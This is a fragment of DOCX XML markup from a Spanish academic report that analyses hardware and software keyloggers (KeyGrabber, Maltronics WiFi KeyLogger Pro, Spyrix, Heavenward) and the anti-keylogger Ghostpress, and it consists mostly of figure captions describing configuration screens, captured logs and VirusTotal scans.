      </w:r>
      <w:r w:rsidR="00A15FC5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1912111727"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00A15FC5">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00A15FC5">
            <w:instrText xml:space="preserve"> CITATION Kee4 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00A15FC5">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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584B7264" wp14:editId="6170427D">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2AB39F49" wp14:editId="47F2803F">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17324F" w:rsidRPr="00E35430" w:rsidRDefault="0017324F" w:rsidP="00E80EE8">
                            <w:pPr>
                              <w:pStyle w:val="Descripcin"/>
                              <w:rPr>
                                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                                <w:noProof/>
                              </w:rPr>
                            </w:pPr>
                            <w:bookmarkStart w:id="113" w:name="_Toc19358164"/>
                            <w:r>
                              <w:t xml:space="preserve">Ilustración </w:t>
                            </w:r>
                            <w:r w:rsidR="008400F5">
                              <w:fldChar w:fldCharType="begin"/>
                            </w:r>
                            <w:r w:rsidR="008400F5">
                              <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
                            </w:r>
                            <w:r w:rsidR="008400F5">
                              <w:fldChar w:fldCharType="separate"/>
                            </w:r>
                            <w:r w:rsidR="00E24312">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>25</w:t>
                            </w:r>
                            <w:r w:rsidR="008400F5">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>.</w:t>
                            </w:r>
                            <w:r>
                              <w:br/>
                              <w:t>KeyGrabber en su empaquetado origin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39F49"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17324F" w:rsidRPr="00E35430" w:rsidRDefault="0017324F" w:rsidP="00E80EE8">
                      <w:pPr>
                        <w:pStyle w:val="Descripcin"/>
                        <w:rPr>
                          <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:bookmarkStart w:id="114" w:name="_Toc19358164"/>
                      <w:r>
                        <w:t xml:space="preserve">Ilustración </w:t>
                      </w:r>
                      <w:r w:rsidR="008400F5">
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r w:rsidR="008400F5">
                        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
                      </w:r>
                      <w:r w:rsidR="008400F5">
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidR="00E24312">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>25</w:t>
                      </w:r>
                      <w:r w:rsidR="008400F5">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>.</w:t>
                      </w:r>
                      <w:r>
                        <w:br/>
                        <w:t>KeyGrabber en su empaquetado original.</w:t>
                      </w:r>
                      <w:bookmarkEnd w:id="114"/>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3D2ECABA" wp14:editId="4724133E">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17324F" w:rsidRPr="00B755CF" w:rsidRDefault="0017324F" w:rsidP="00E80EE8">
                            <w:pPr>
                              <w:pStyle w:val="Descripcin"/>
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                            </w:pPr>
                            <w:bookmarkStart w:id="115" w:name="_Toc19358165"/>
                            <w:r>
                              <w:t xml:space="preserve">Ilustración </w:t>
                            </w:r>
                            <w:r w:rsidR="008400F5">
                              <w:fldChar w:fldCharType="begin"/>
                            </w:r>
                            <w:r w:rsidR="008400F5">
                              <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
                            </w:r>
                            <w:r w:rsidR="008400F5">
                              <w:fldChar w:fldCharType="separate"/>
                            </w:r>
                            <w:r w:rsidR="00E24312">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>26</w:t>
                            </w:r>
                            <w:r w:rsidR="008400F5">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>. KeyGrabber conectado al teclad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ECABA"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17324F" w:rsidRPr="00B755CF" w:rsidRDefault="0017324F" w:rsidP="00E80EE8">
                      <w:pPr>
                        <w:pStyle w:val="Descripcin"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:bookmarkStart w:id="116" w:name="_Toc19358165"/>
                      <w:r>
                        <w:t xml:space="preserve">Ilustración </w:t>
                      </w:r>
                      <w:r w:rsidR="008400F5">
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r w:rsidR="008400F5">
                        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
                      </w:r>
                      <w:r w:rsidR="008400F5">
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidR="00E24312">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>26</w:t>
                      </w:r>
                      <w:r w:rsidR="008400F5">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>. KeyGrabber conectado al teclado.</w:t>
                      </w:r>
                      <w:bookmarkEnd w:id="116"/>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4E030AEA" wp14:editId="65C6813B">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B58A68E" wp14:editId="62FA3B33">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7" w:name="_Toc19358166"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Ejemplo de fichero de LOG con el contenido capturado por el keylogger.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>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8" w:name="_Toc18453518"/>
      <w:bookmarkStart w:id="119" w:name="_Toc19810071"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Maltronics </w:t>
      </w:r>
      <w:r w:rsidR="00B87665">
        <w:t xml:space="preserve">WiFi KeyLogger </w:t>
      </w:r>
      <w:r>
        <w:t>Pro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
      <w:bookmarkEnd w:id="119"/>
    </w:p>
    <w:p w:rsidR="00F23A72" w:rsidRDefault="001527DC" w:rsidP="0077360B">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Este keylogger</w:t>
      </w:r>
      <w:r w:rsidR="00126288">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1734227314"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00126288">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00126288">
            <w:instrText xml:space="preserve"> CITATION Mal \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00126288">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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4BDF469" wp14:editId="765634A9">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20" w:name="_Toc19358167"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Vista del SSID </w:t>
      </w:r>
      <w:r w:rsidR="00232B94">
        <w:t>activo del keylogger analizado.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>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642F3366" wp14:editId="01D3C193">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21" w:name="_Toc19358168"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Pantalla de configuración del punto de acceso Wifi del keylogger.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>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3B5DEFF" wp14:editId="6338B820">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2" w:name="_Toc19358169"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Pantalla de configuración del registro de teclas.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>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1FC8C27" wp14:editId="2099768F">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3" w:name="_Toc19358170"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra del contenido registrado por el keylogger accedido a través de la conexión WiFi.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="123"/>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3A65FCE1" wp14:editId="75A30EAA">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4" w:name="_Toc19358171"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Ejemplo de recepción de las teclas del keylogger en tiempo real mediante data streaming.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>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5" w:name="__RefHeading___Toc923_3518492859"/>
      <w:bookmarkStart w:id="126" w:name="_Toc18453519"/>
      <w:bookmarkStart w:id="127" w:name="_Toc19810072"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Análisis de Keylogger </w:t>
      </w:r>
      <w:r w:rsidR="003623F6">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00231F20" w:rsidRPr="00853E9A">
        <w:t>oftware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="125"/>
      <w:bookmarkEnd w:id="126"/>
      <w:bookmarkEnd w:id="127"/>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r>
        <w:br/>
      </w:r>
      <w:bookmarkStart w:id="128" w:name="_Toc19810127"/>
      <w:r w:rsidR="00E935E6">
        <w:t xml:space="preserve">Tabla </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Tabla \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>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8"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00760E2A">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00760E2A">
            <w:instrText xml:space="preserve"> CITATION Des \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00760E2A">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[60]</w:t>
          </w:r>
          <w:r w:rsidR="00760E2A">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00F43945">
        <w:t xml:space="preserve"> y el segundo ha sido Heavenward Keylogger</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1919667368"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00F43945">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F43945">
            <w:instrText xml:space="preserve"> CITATION Hea \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00F43945">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[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9" w:name="_Toc18453520"/>
      <w:bookmarkStart w:id="130" w:name="__RefHeading___Toc925_3518492859"/>
      <w:bookmarkStart w:id="131" w:name="_Toc19810073"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Análisis de</w:t>
      </w:r>
      <w:r w:rsidR="00ED4221" w:rsidRPr="00ED4221">
        <w:t xml:space="preserve"> Spyrix Free Keylogger</w:t>
      </w:r>
      <w:bookmarkEnd w:id="129"/>
      <w:bookmarkEnd w:id="131"/>
      <w:r w:rsidRPr="00ED4221">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
    </w:p>
    <w:p w:rsidR="00B10408" w:rsidRDefault="002E6F22" w:rsidP="0077360B">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:bookmarkStart w:id="132"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0B76822D" wp14:editId="5C6CB9E9">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3" w:name="_Toc19358172"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* A</w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve">RABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>33</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Advertencia legal de Spyrix Free Keylogger</w:t>
      </w:r>
      <w:bookmarkEnd w:id="133"/>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5224F703" wp14:editId="6F24FFFC">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4" w:name="_Toc19358173"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>34</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra de la pantalla de monitorización web de Spyrix Free Keylogger.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="134"/>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797D54D7" wp14:editId="582CA454">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5" w:name="_Toc19358174"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>35</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra de registro de eventos en aplicación local de Spyrix Free Keylogger.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="135"/>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43A91DD5" wp14:editId="49EA3CC2">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6" w:name="_Toc19358175"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>36</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Carpeta donde se instala Spyrix Free Keylogger.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="136"/>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EndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION Vir2 \l 3082 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[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3A29CA26" wp14:editId="703CEE51">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7" w:name="_Toc19358176"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>37</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Resultado escaneo sps.exe en Virus Total.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="137"/>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End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DF019A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
            </w:rPr>
            <w:t>[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6C8F8372" wp14:editId="58B2AD84">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8" w:name="_Toc19358177"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>38</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Carpetas de datos que recopila Spyrix Free Keylogger.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="138"/>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59B77998" wp14:editId="6EC0917C">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9" w:name="_Toc19358178"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>39</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra de la carpeta /logs/ donde queda registrada toda la actividad y tecleo.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="139"/>
    </w:p>
    <w:p w:rsidR="005C4A8C" w:rsidRDefault="005C4A8C" w:rsidP="0077360B">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B029AB" w:rsidRDefault="00CC0ABC" w:rsidP="00CC0ABC">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="140" w:name="_Toc18453521"/>
      <w:bookmarkStart w:id="141" w:name="_Toc19810074"/>
      <w:bookmarkEnd w:id="132"/>
      <w:r>
        <w:t>Análisis de Heavenward KeyLogger</w:t>
      </w:r>
      <w:bookmarkEnd w:id="140"/>
      <w:bookmarkEnd w:id="141"/>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C9A3702" wp14:editId="733D3665">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2" w:name="_Toc19358179"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Pantalla de configuración de Heavenward Keylogger.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="142"/>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0E5CA579" wp14:editId="1344D246">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3" w:name="_Toc19358180"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>41</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Carpeta donde se instala la aplicación y fichero de datos que genera.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="143"/>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52438D90" wp14:editId="049AA7C1">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4" w:name="_Toc19358181"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>42</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra de fichero de datos con información tecleada capturada por el keylogger.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="144"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00C82E90">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C82E90">
            <w:instrText xml:space="preserve"> CITATION Vir3 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C82E90">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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3C2253CE" wp14:editId="0BF5E4A0">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5" w:name="_Toc18453522"/>
      <w:bookmarkStart w:id="146" w:name="_Toc19810075"/>
      <w:r>
        <w:t>Conclusiones</w:t>
      </w:r>
      <w:bookmarkEnd w:id="145"/>
      <w:bookmarkEnd w:id="146"/>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7" w:name="_Toc18453523"/>
      <w:bookmarkStart w:id="148" w:name="_Toc19810076"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Anti-Keyloggers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="147"/>
      <w:bookmarkEnd w:id="14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9" w:name="_Toc18453524"/>
      <w:bookmarkStart w:id="150" w:name="_Toc19810077"/>
      <w:r>
        <w:t>Análisis de Ghostpress</w:t>
      </w:r>
      <w:bookmarkEnd w:id="149"/>
      <w:bookmarkEnd w:id="150"/>
    </w:p>
    <w:p w:rsidR="00E90D09" w:rsidRDefault="00D21F26" w:rsidP="00E90D09">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Como suele ser aconsejable,</w:t>
      </w:r>
      <w:r w:rsidR="008A4A37">
        <w:t xml:space="preserve"> antes de instalar Ghostpress</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-361365675"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="008A4A37">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="008A4A37">
            <w:instrText xml:space="preserve">CITATION Ghostp \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="008A4A37">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[65]</w:t>
          </w:r>
          <w:r w:rsidR="008A4A37">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve"> procedemos a analizar el instalador del programa con Virus Total </w:t>
